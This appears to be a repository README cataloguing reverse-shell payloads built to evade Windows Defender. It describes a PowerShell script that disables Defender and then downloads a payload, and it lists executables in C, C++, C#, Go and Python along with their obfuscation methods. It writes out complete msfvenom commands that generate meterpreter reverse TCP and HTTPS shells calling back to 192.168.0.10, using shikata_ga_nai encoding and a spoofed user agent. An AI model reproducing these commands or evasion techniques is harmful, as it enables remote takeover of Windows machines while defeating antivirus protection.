# !!DOWNLOAD ONLY IN A CONTROLLED ENVIRONMENT!!

## all payloads here points to host 192.168.0.10:4444

### Warning: Downloading items here will likely trigger alerts with your antivirus programs, do so in a controlled enviroment. Executing files here technically should post no harm since they only connet to a prive IP, again, do so in a controlled enviroment.

`kib_keyboard.ps1` is a powershell script that disables windows defender and notifications, then downloads the actual payload.

### payload descriptions (files denoted with X is detected by windows defender):
1. `kidx86.exe` is a x86 tcp reverse shell writtern in c++ endcoded using shikata_ga_nai, with byte change, scrambled byes, extra dummy bytes and byte order obfuscation. 12/69 hits in [VirusTotal](https://www.virustotal.com/gui/file/f0223b32b6d12ea8414eff31ec673b9438d988532bc6b2623ed1d42215f35803/detection) (when it was first submitted). Able to bypass windows defender.
2. `kidx86_source.cpp` is the source file of the payload.
3. `shell.c` is the raw payload from msfvenom. Generated by ```msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.10 LPORT=4444 -e x86/shikata_ga_nai -i 8 -f c > shell.c```
4. `shell.exe` is a generic tcp reverse shell. X
5. `bkbx64.exe` is a x64 tcp reverse shell encoded in a custom c++ payload. X
6. `bkbx86.exe` is a x86 tcp reverse shell encoded in a custom c++ payload. X
7. `bkbpayload.ll` and `bkbpayloadraw.cs` are XOR encoded tcp revershell written in a custom C# payload that uses a powershell file to download and execute in memory. (doesn't work)
8. `test1.exe` is a tcp reverse shell encoded in custom python payload. X 
9. `testing9.exe` is a edited tcp reverse shell created using veil before changing from .bat to .exe. X
10. `c_rtcp.exe` is a tcp reverse shell written in C. X
11. `cs_rtcp.exe` is a tcp reverse shell written in C#. X
12. `go_rtcp.exe` is a tcp reverse shell written in go. X


Generating HTTPS reverse shell ```msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.0.10 LPORT=443 HttpUserAgent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36" -e x86/shikata_ga_nai -i 8 -f c > shell.c```

A number of tools and lanaguages was used to the process of trying to bypass windows defender, including: Veil, metasploit windows defender evasion, complining custom payloads, we tried payloads encoded using python, c, c++, c#, ruby, go, java.
